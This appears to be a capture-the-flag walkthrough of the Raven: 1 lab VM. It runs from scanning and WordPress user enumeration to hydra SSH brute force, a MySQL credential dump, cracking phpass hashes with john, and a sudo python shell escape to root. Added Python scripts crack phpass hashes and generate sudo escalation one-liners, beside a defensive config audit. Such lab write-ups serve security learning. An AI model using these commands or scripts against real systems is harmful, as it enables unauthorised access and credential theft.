Introduction Raven: 1

Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on VirtualBox. Set up to use NAT networking. If you want to watch the video, visit Vulnerable Machine Solution.

Required skill for exploiting Raven: 1

  1. Ethical Hacking skills
  2. Basic mysql database
  3. Knowledge of Linux & its tools
  4. Social Engineering 
  5. Basic knowledge of python

Let's start the walkthrough of Raven: 1

[[email protected] ~]# arp-scan -l 

This scans the local network with ARP and lists every host that answers, as shown in the figure.

[[email protected] ~]# nmap -sS -sV 192.168.136.150
nmap result of Raven: 1

Let's understand the nmap output above.

-sS performs a TCP SYN (half-open) scan, -sV probes each open port for the service name and version, and the final argument is the target IP.

As we can see in the figure, three ports are open, each with its service version:
port 22 is SSH,
port 80 is the web server, and
port 111 is rpcbind.
[[email protected] ~]# dirb http://192.168.136.150

The above command brute-forces common directory and file names on the web server and lists the ones that exist, as shown in the figure.

The dirb output includes http://192.168.136.150/wordpress, which strongly suggests the site runs WordPress; opening it in the browser confirms it, as shown in the image.

Now I use wpscan to enumerate the WordPress site (--enumerate u lists its users).

[[email protected] ~]# wpscan --url http://192.168.136.150/wordpress --enumerate u

wpscan found two users, michael and steven. I put both names in a file called users and brute-forced SSH with hydra using the rockyou wordlist; michael's password came back almost instantly, steven's did not. (hydra reads the -P wordlist as plain text, so on Kali run gunzip on rockyou.txt.gz first.)

[[email protected] ~]# hydra -L users -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.136.150

We now have a foothold on the machine as an unprivileged local user.

[[email protected] ~]# ssh michael@192.168.136.150

Logging in with the password we recovered for michael gets us onto the target as that user. Next we look for a way to become root.

Privilege escalation of Raven: 1

I then tried many privilege-escalation approaches without success, so I went to the document root where the WordPress files live and found the configuration file /var/www/html/wordpress/wp-config.php, which stores the database credentials in plain text; the database user is root.

user name:- root & password:- [email protected]
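The credentials sitting in wp-config.php are the pivot for everything that follows, so here is a small audit script, added here as an example and not part of the original walkthrough, that parses the define() lines of a wp-config.php, flags a root database user, and checks whether the file is readable by other local accounts (which is what let michael read it on this box). The file content is a constructed stand-in in the standard WordPress layout; the password in it is a placeholder, not the value from the machine.

```python
import os
import re
import stat
import tempfile

# Constructed stand-in for /var/www/html/wordpress/wp-config.php on the box.
# The layout is the standard WordPress one; the password is a placeholder and
# NOT the value from the machine.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'placeholder-not-the-real-password');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
$table_prefix = 'wp_';
"""

# define('NAME', 'value');  -- tolerates extra spacing and either quote style
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)\s*;""")


def parse_wp_config(text):
    """Return the define()d constants of a wp-config.php as a dict."""
    return dict(DEFINE_RE.findall(text))


def audit_wp_config(path):
    """Parse the file at `path` and return (config, findings).

    Findings describe the two weaknesses this box exposes: the site runs as
    the MySQL superuser, and the file is readable by any local account, so a
    foothold as one user hands over the whole database.
    """
    with open(path, encoding="utf-8") as fh:
        cfg = parse_wp_config(fh.read())
    findings = []
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is root: WordPress runs with MySQL superuser rights; "
                        "create a dedicated user granted only the wordpress database")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"wp-config.php is readable by group/other (mode {mode:04o}); "
                        f"chmod 0600 and chown it to the web server user")
    return cfg, findings


def audit_sample(mode=0o644):
    """Write the constructed config to a temp file with `mode` and audit it."""
    fd, path = tempfile.mkstemp(suffix="-wp-config.php")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_WP_CONFIG)
        os.chmod(path, mode)
        return audit_wp_config(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    cfg, findings = audit_sample()
    print("DB_USER =", cfg["DB_USER"], "DB_HOST =", cfg["DB_HOST"])
    for f in findings:
        print("-", f)
```

Point audit_wp_config at the real file on a box you have a shell on; both findings from the sample apply to Raven as the walkthrough describes it.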

After logging in to MySQL with those credentials, I pulled the password hash of the other user, steven, from the wp_users table and cracked it with john, as shown below.

[email protected]:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.04 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | [email protected] |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | [email protected] |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql>
[email protected]:~/raven1# john hash.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84 (?)
1g 0:00:14:15 DONE 3/3 (2018-11-18 05:38) 0.001169g/s 4325p/s 4325c/s 4325C/s pink90..pingen
Use the "--show" option to display all of the cracked passwords reliably
Session completed
[email protected]:~/raven1#

The output above shows the database contents and the phpass hash of the second user. Saving steven's hash to hash.txt and running john recovers the password pink84, so now let's log in as steven.
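WordPress stores these hashes in the phpass portable format: a $P$ prefix, one character encoding the iteration count (B means 2^13 = 8192 rounds), eight salt characters, then an MD5 of salt+password fed through those further MD5 rounds and encoded with phpass' own 64-character alphabet. The Python below re-implements that scheme, parses the wp_users dump from the session above, and runs a small dictionary attack over it. It is an added example rather than the author's code: the dump is a trimmed copy keeping only the three columns the attack needs, and the wordlist is constructed and deliberately tiny (rockyou would be the real one).

```python
import hashlib

# phpass' own 64-character alphabet (not standard base64)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed trimmed copy of the wp_users dump from the MySQL session above;
# only the three columns the attack needs are kept.
WP_USERS_DUMP = """\
+----+------------+------------------------------------+
| ID | user_login | user_pass                          |
+----+------------+------------------------------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ |
+----+------------+------------------------------------+
"""


def _encode64(data, count):
    """phpass encoding: 3 bytes -> 4 chars, least-significant 6 bits first."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password, setting):
    """Recompute the portable hash for `password` under `setting` ($P$ or $H$,
    one char of log2 iteration count, 8 chars of salt). None if malformed."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        return None
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:
        return None
    pw = password.encode("utf-8")
    digest = hashlib.md5(setting[4:12].encode("ascii") + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password, stored):
    """True if `password` reproduces `stored` (salt and count are read from it)."""
    return phpass_hash(password, stored[:12]) == stored


def parse_wp_users(dump):
    """Extract {user_login: user_pass} from a mysql-formatted wp_users dump."""
    users = {}
    for line in dump.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) >= 3 and cells[0] != "ID":
            users[cells[1]] = cells[2]
    return users


def crack_wp_users(dump, wordlist):
    """Dictionary attack every account in the dump; None where nothing matched."""
    return {login: next((w for w in wordlist if phpass_verify(w, stored)), None)
            for login, stored in parse_wp_users(dump).items()}


if __name__ == "__main__":
    # constructed wordlist, deliberately tiny
    print(crack_wp_users(WP_USERS_DUMP, ["raven", "seagull", "pink84"]))
```

Each guess costs 8193 MD5 calls, which is why john took fourteen minutes with its default modes; the same per-guess cost is what makes phpass with a higher count a reasonable (if dated) choice for the defender.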

[[email protected] ~]# ssh steven@192.168.136.150
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
$ sudo /usr/bin/python
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
import os;
os.system("/bin/bash")
[email protected]:/home/steven# cd
[email protected]:~# cat flag4.txt

Finally we have root and the last flag.
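The root shell works because sudo lets steven run an interpreter as root with no password, and python can spawn a shell. Whether you are working a box or auditing your own sudoers, you want to spot that automatically; the script below, added here as an example and not from the original post, parses `sudo -l` output into entries, flags commands whose program is a known shell escape, and builds the one-liner equivalent of the interactive session above. The `sudo -l` text is the one printed on this box plus one constructed extra entry (the systemctl line) to show a command that is not flagged.

```python
import os
import re
import shlex

# Programs that, run as root via sudo, hand back a root shell with a single
# argument or key press; the /usr/bin/python entry on this box is one instance.
SHELL_ESCAPES = {
    "python", "python2", "python3", "perl", "ruby", "php", "lua", "node",
    "bash", "sh", "dash", "zsh", "vi", "vim", "nano", "less", "more", "find", "awk", "env",
}

# One-liners equivalent to the interactive `import os; os.system("/bin/bash")`
ONELINERS = {
    "python": "{bin} -c 'import os; os.system(\"/bin/bash\")'",
    "python2": "{bin} -c 'import os; os.system(\"/bin/bash\")'",
    "python3": "{bin} -c 'import os; os.system(\"/bin/bash\")'",
    "perl": "{bin} -e 'exec \"/bin/bash\";'",
}

# `sudo -l` as printed on the box, plus one constructed extra entry
# (the systemctl line) to show a command that is not flagged.
SUDO_L_OUTPUT = """\
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
    (root) /usr/bin/systemctl restart apache2
"""

# "(runas) TAG: TAG: command"   e.g. "(ALL) NOPASSWD: /usr/bin/python"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return the command entries of `sudo -l` output as dicts."""
    entries, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = ENTRY_RE.match(line) if in_commands else None
        if m:
            entries.append({
                "runas": m.group("runas").strip(),
                "tags": {t.rstrip(":") for t in m.group("tags").split()},
                "command": m.group("cmd").strip(),
            })
    return entries


def find_shell_escapes(entries):
    """Entries whose program is a known shell escape, e.g. an interpreter."""
    flagged = []
    for e in entries:
        argv = shlex.split(e["command"])
        if argv and os.path.basename(argv[0]) in SHELL_ESCAPES:
            flagged.append(e)
    return flagged


def escalation_command(entry):
    """The sudo one-liner that yields a root shell for a flagged entry, or None."""
    binary = shlex.split(entry["command"])[0]
    template = ONELINERS.get(os.path.basename(binary))
    return None if template is None else "sudo " + template.format(bin=binary)


if __name__ == "__main__":
    for e in find_shell_escapes(parse_sudo_l(SUDO_L_OUTPUT)):
        nopass = "NOPASSWD" in e["tags"]
        print(f"({e['runas']}) {e['command']}  nopasswd={nopass}")
        print("  ->", escalation_command(e))
```

The fix on the defending side is the mirror image of the check: a sudoers rule for a general-purpose interpreter grants root, however narrow it looks, so it should be replaced by a rule for the specific script that needs to run, or removed.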

Here is a summary of all the commands used to exploit Raven: 1.

[[email protected] ~]# arp-scan -l 

[[email protected] ~]# nmap -sS -sV 192.168.136.150

[[email protected] ~]# dirb http://192.168.136.150

[[email protected] ~]# wpscan --url http://192.168.136.150/wordpress --enumerate u

[[email protected] ~]# hydra -L users -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.136.150

[[email protected] ~]# ssh michael@192.168.136.150

[email protected]:~$ nano /var/www/html/wordpress/wp-config.php

[email protected]:~$ mysql -u root -p

mysql> show databases;

mysql> show tables;

mysql> select * from wp_users;

[[email protected]:~]# john hash.txt

[[email protected] ~]# ssh steven@192.168.136.150

$ sudo -l

$ sudo /usr/bin/python

import os;

os.system("/bin/bash")

[email protected]:~# cd

[email protected]:~# cat flag4.txt

I hope you enjoyed this. If you have any query you can ask me in the comments, and subscribe to my YouTube channel Vulnerable Machine Solution.


1 Comment

Nitin Kumar · 20th November 2018 at 12:38 am

awesome…..and interesting……
